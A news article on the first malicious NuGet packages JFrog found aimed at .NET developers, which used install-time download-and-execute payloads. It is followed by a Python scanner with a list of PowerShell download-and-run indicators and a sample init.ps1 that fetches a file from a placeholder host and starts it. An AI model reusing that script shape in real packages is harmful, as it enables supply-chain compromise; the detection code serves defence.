Threat actors have been observed using the open source package manager NuGet to craft malicious packages targeting .NET developers.
According to software package management company JFrog, the discovery would represent the first instance in the wild of packages with malicious code found in NuGet.
“For the first time, the NuGet repository – once thought to be untouched by malicious code – actually contains several harmful software packages designed to run automatically and often connected to further infected dependencies,” explained Shachar Menashe, senior director at JFrog Security Research. “This proves that no open source repository is safe from malicious actors.”
According to an advisory written by JFrog security researchers Natan Nehorai and Brian Moussalli, the packages were downloaded 150,000 times over the past month.
“[They] contained a ‘download & execute’ type of payload [...]. A PowerShell script that would execute upon installation and trigger a download of a ‘2nd stage’ payload, which could be remotely executed. The 2nd stage payload is a custom, more sophisticated executable,” wrote Nehorai and Moussalli.
The second-stage payload delivers several capabilities that include a crypto stealer, an Electron archive extractor (which also supports code execution) and an auto-updater.
In the advisory, the JFrog security experts said that upon contacting NuGet administrators, they were told the team was aware of the malicious packages and had removed them.
Still, Menashe said that .NET developers remain at high risk from malicious code, because the observed NuGet packages still contain facilities to run code upon package installation.
“Even though the culpable malicious packages have [...] been removed, .NET developers using NuGet are still at high risk of malicious code infecting their environments,” the executive added. “[They] should take caution when curating open-source components for use in their builds – and at every step of the software development lifecycle – to ensure the software supply chain remains secure.”
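The install-time execution surface described above can be checked for before a package is admitted into a build. The following is an added example, not code from JFrog or the NuGet project: it treats a .nupkg as the zip archive it is, lists every PowerShell script under tools/ (the location NuGet uses for install-time scripts such as init.ps1), and flags download-and-execute indicators. The indicator list and the in-memory sample packages are constructed for this example.

```python
import io
import re
import zipfile

# Indicators of a "download & execute" pattern in an install-time script.
# Constructed list for this example; extend it for your own environment.
DOWNLOAD_PATTERNS = [
    r"Invoke-WebRequest", r"\biwr\b", r"\bwget\b", r"\bcurl\b",
    r"DownloadString", r"DownloadFile", r"Net\.WebClient",
    r"Start-Process", r"Invoke-Expression", r"\biex\b",
    r"FromBase64String",
]
PATTERN_RE = re.compile("|".join(DOWNLOAD_PATTERNS), re.IGNORECASE)


def scan_nupkg(data: bytes) -> dict:
    """Return {script_path: [matched indicators]} for every PowerShell script
    under tools/ in a .nupkg. A script with an empty list still means the
    package can run code on installation and deserves manual review."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            lower = name.lower()
            if lower.startswith("tools/") and lower.endswith(".ps1"):
                text = zf.read(name).decode("utf-8", errors="replace")
                hits = sorted({m.group(0) for m in PATTERN_RE.finditer(text)})
                findings[name] = hits
    return findings


def build_sample_nupkg(script: str) -> bytes:
    """Construct a minimal .nupkg in memory for demonstration (not a real package)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("example.nuspec", "<package><metadata><id>example</id></metadata></package>")
        zf.writestr("lib/net6.0/example.dll", b"")
        zf.writestr("tools/init.ps1", script)
    return buf.getvalue()


# Constructed sample scripts: one benign, one showing the download-and-run shape.
BENIGN_SCRIPT = "param($installPath, $toolsPath, $package, $project)\nWrite-Host 'installed'\n"
SUSPICIOUS_SCRIPT = (
    "param($installPath, $toolsPath, $package, $project)\n"
    "$u = 'https://example.invalid/stage2'   # placeholder, not a real URL\n"
    "$p = Join-Path $env:TEMP 'stage2.exe'\n"
    "Invoke-WebRequest -Uri $u -OutFile $p\n"
    "Start-Process $p\n"
)

if __name__ == "__main__":
    for label, script in (("benign", BENIGN_SCRIPT), ("suspicious", SUSPICIOUS_SCRIPT)):
        print(label, scan_nupkg(build_sample_nupkg(script)))
```

Run against real packages by passing the bytes of a downloaded .nupkg to scan_nupkg; any script found is a signal to review the package before it reaches a build host.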
For additional information about securing open source software, head over to this analysis by OpenUK CEO, Amanda Brock.